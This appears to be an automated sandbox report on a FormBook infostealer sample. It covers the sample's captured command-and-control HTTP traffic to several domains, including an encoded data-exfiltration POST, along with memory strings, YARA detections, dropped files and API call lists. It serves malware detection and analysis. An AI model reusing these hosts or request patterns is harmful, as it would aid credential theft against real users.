          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=EEC3trxbjpZjES3J8UzdywVW4camKv5lKnOZdgutgRQJhFNNU6ohax/dLti9iqHJLoKb&HN68=m8ZXDT HTTP/1.1Host: www.spatren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=TJu9kd1J3sj1sjyEQYrTfM8kzVKXOtoVWGC/eynSyKofNPs3fDsvQyrmT3NPrOg1vii2&HN68=m8ZXDT HTTP/1.1Host: www.app7924.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=jkOn9Rty+lecef8GTlcZ36CwLFKq9e7GvHBSrLgwDHppX0QlwzfNM6KJV290CG150kbC&HN68=m8ZXDT HTTP/1.1Host: www.ptgws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.spatren.com
          Source: unknownHTTP traffic detected: POST /sr1/ HTTP/1.1Host: www.app7924.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.app7924.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.app7924.com/sr1/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 7a 72 68 41 3d 62 72 69 48 36 36 56 49 69 4d 54 39 7e 42 65 5f 63 74 69 36 4c 4a 77 62 6b 33 53 51 4a 35 73 30 4c 41 6a 4a 49 51 54 34 78 61 63 37 4a 2d 45 7a 53 47 39 48 58 45 75 71 42 42 6c 4f 6d 62 6f 4b 33 68 50 4a 6e 77 37 31 32 79 69 78 6c 46 62 70 67 48 38 39 56 69 42 32 6f 4a 63 64 65 4c 49 70 6f 34 57 44 77 72 56 31 59 4f 48 44 64 42 50 32 5a 4b 65 33 79 6b 34 50 38 5a 28 54 67 48 74 70 6f 4a 57 79 37 61 6c 42 5a 4c 76 30 30 4b 68 4f 58 4d 55 61 6c 4d 71 66 41 35 73 4a 4f 67 76 58 62 34 4c 66 56 37 55 65 36 58 6a 70 53 51 64 74 48 54 69 34 55 6c 76 67 46 79 59 5a 28 67 64 4d 39 39 61 51 42 36 6f 34 68 75 76 6a 38 51 4f 35 28 77 28 71 45 35 70 53 33 51 42 69 66 30 62 56 52 69 56 63 42 6b 4a 73 58 64 62 48 4f 78 4d 68 6c 61 73 65 4d 74 76 69 50 34 69 78 4b 75 35 52 6b 64 77 46 6d 6e 76 76 6a 4d 33 70 57 67 74 70 62 56 43 61 4a 78 50 46 73 76 55 65 32 41 6a 48 51 6f 7a 39 79 70 58 36 62 34 49 47 34 51 56 70 37 4c 5a 73 41 65 64 36 57 44 47 78 70 64 36 77 6f 53 72 61 6b 5f 70 72 58 58 76 79 38 72 56 67 42 52 50 55 44 6d 75 34 48 6f 72 4c 4e 4f 7e 70 39 6b 64 6d 52 78 45 78 50 59 58 4c 78 6c 42 42 38 79 6d 4c 59 78 50 65 54 32 4a 37 50 6c 6c 74 39 4e 45 5f 5a 53 6a 2d 31 53 72 6a 28 78 6d 51 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: azrhA=briH66VIiMT9~Be_cti6LJwbk3SQJ5s0LAjJIQT4xac7J-EzSG9HXEuqBBlOmboK3hPJnw712yixlFbpgH89ViB2oJcdeLIpo4WDwrV1YOHDdBP2ZKe3yk4P8Z(TgHtpoJWy7alBZLv00KhOXMUalMqfA5sJOgvXb4LfV7Ue6XjpSQdtHTi4UlvgFyYZ(gdM99aQB6o4huvj8QO5(w(qE5pS3QBif0bVRiVcBkJsXdbHOxMhlaseMtviP4ixKu5RkdwFmnvvjM3pWgtpbVCaJxPFsvUe2AjHQoz9ypX6b4IG4QVp7LZsAed6WDGxpd6woSrak_prXXvy8rVgBRPUDmu4HorLNO~p9kdmRxExPYXLxlBB8ymLYxPeT2J7Pllt9NE_ZSj-1Srj(xmQcA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Jun 2020 11:38:51 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sr1/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000003.00000000.782503397.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpJ
          Source: cmmon32.exe, 00000004.00000002.1188589536.0000000000D9C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.1199851699.0000000005609000.00000004.00000001.sdmpString found in binary or memory: http://www.ptgws.com
          Source: cmmon32.exe, 00000004.00000002.1199851699.0000000005609000.00000004.00000001.sdmpString found in binary or memory: http://www.ptgws.com/sr1/
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.807763765.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\38843287\388logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\38843287\388logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\38843287\388logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D038C NtQueryInformationProcess,0_2_023D038C
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D64B0 NtQueryInformationProcess,0_2_023D64B0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00419830 NtCreateFile,2_2_00419830
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_004198E0 NtReadFile,2_2_004198E0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00419960 NtClose,2_2_00419960
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00419A10 NtAllocateVirtualMemory,2_2_00419A10
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041982B NtCreateFile,2_2_0041982B
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_004198DA NtReadFile,2_2_004198DA
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041995A NtClose,2_2_0041995A
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00419A0A NtAllocateVirtualMemory,2_2_00419A0A
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_004197EA NtCreateFile,2_2_004197EA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCACE0 NtCreateMutant,LdrInitializeThunk,4_2_04FCACE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA480 NtMapViewOfSection,LdrInitializeThunk,4_2_04FCA480
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA470 NtSetInformationFile,LdrInitializeThunk,4_2_04FCA470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA410 NtQueryInformationToken,LdrInitializeThunk,4_2_04FCA410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_04FCA560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA540 NtDelayExecution,LdrInitializeThunk,4_2_04FCA540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA6A0 NtCreateSection,LdrInitializeThunk,4_2_04FCA6A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04FCA610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA750 NtCreateFile,LdrInitializeThunk,4_2_04FCA750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA800 NtSetValueKey,LdrInitializeThunk,4_2_04FCA800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA2D0 NtClose,LdrInitializeThunk,4_2_04FCA2D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA260 NtWriteFile,LdrInitializeThunk,4_2_04FCA260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA240 NtReadFile,LdrInitializeThunk,4_2_04FCA240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04FCA3E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA3D0 NtCreateKey,LdrInitializeThunk,4_2_04FCA3D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04FCA360
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA350 NtQueryValueKey,LdrInitializeThunk,4_2_04FCA350
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_04FCA310
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA4A0 NtUnmapViewOfSection,4_2_04FCA4A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCB470 NtOpenThread,4_2_04FCB470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA460 NtOpenProcess,4_2_04FCA460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA430 NtQueryVirtualMemory,4_2_04FCA430
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCB410 NtOpenProcessToken,4_2_04FCB410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA5F0 NtReadVirtualMemory,4_2_04FCA5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA5A0 NtWriteVirtualMemory,4_2_04FCA5A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCBD40 NtSuspendThread,4_2_04FCBD40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA520 NtEnumerateKey,4_2_04FCA520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA6D0 NtCreateProcessEx,4_2_04FCA6D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA650 NtQueueApcThread,4_2_04FCA650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA780 NtOpenDirectoryObject,4_2_04FCA780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA720 NtResumeThread,4_2_04FCA720
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA710 NtQuerySection,4_2_04FCA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA700 NtProtectVirtualMemory,4_2_04FCA700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCB0B0 NtGetContextThread,4_2_04FCB0B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA2F0 NtQueryInformationFile,4_2_04FCA2F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCBA30 NtSetContextThread,4_2_04FCBA30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA220 NtWaitForSingleObject,4_2_04FCA220
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FCA370 NtQueryInformationProcess,4_2_04FCA370
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F49A10 NtAllocateVirtualMemory,4_2_02F49A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F498E0 NtReadFile,4_2_02F498E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F49830 NtCreateFile,4_2_02F49830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F49960 NtClose,4_2_02F49960
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F49A0A NtAllocateVirtualMemory,4_2_02F49A0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F498DA NtReadFile,4_2_02F498DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4982B NtCreateFile,4_2_02F4982B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4995A NtClose,4_2_02F4995A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F497EA NtCreateFile,4_2_02F497EA
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1038C NtQueryInformationProcess,18_2_00C1038C
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C164B3 NtQueryInformationProcess,18_2_00C164B3
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00419830 NtCreateFile,20_2_00419830
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_004198E0 NtReadFile,20_2_004198E0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00419960 NtClose,20_2_00419960
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00419A10 NtAllocateVirtualMemory,20_2_00419A10
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041982B NtCreateFile,20_2_0041982B
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_004198DA NtReadFile,20_2_004198DA
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041995A NtClose,20_2_0041995A
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00419A0A NtAllocateVirtualMemory,20_2_00419A0A
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_004197EA NtCreateFile,20_2_004197EA
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D22280_2_023D2228
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D72F00_2_023D72F0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DC0400_2_023DC040
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D31500_2_023D3150
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D57F20_2_023D57F2
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DBB3F0_2_023DBB3F
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D0F780_2_023D0F78
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D12100_2_023D1210
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D72E00_2_023D72E0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D53B00_2_023D53B0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D53C00_2_023D53C0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DC0310_2_023DC031
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D30500_2_023D3050
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D51D00_2_023D51D0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D51C10_2_023D51C1
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D56500_2_023D5650
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D56410_2_023D5641
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D66A80_2_023D66A8
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D66980_2_023D6698
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DC4380_2_023DC438
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DC4290_2_023DC429
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D04710_2_023D0471
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D5AA00_2_023D5AA0
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D5A900_2_023D5A90
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D0EE10_2_023D0EE1
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D3FE80_2_023D3FE8
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023D3FD90_2_023D3FD9
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DCC700_2_023DCC70
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 0_2_023DCC600_2_023DCC60
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041C9FB2_2_0041C9FB
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041D1BD2_2_0041D1BD
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041CBC42_2_0041CBC4
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00402D902_2_00402D90
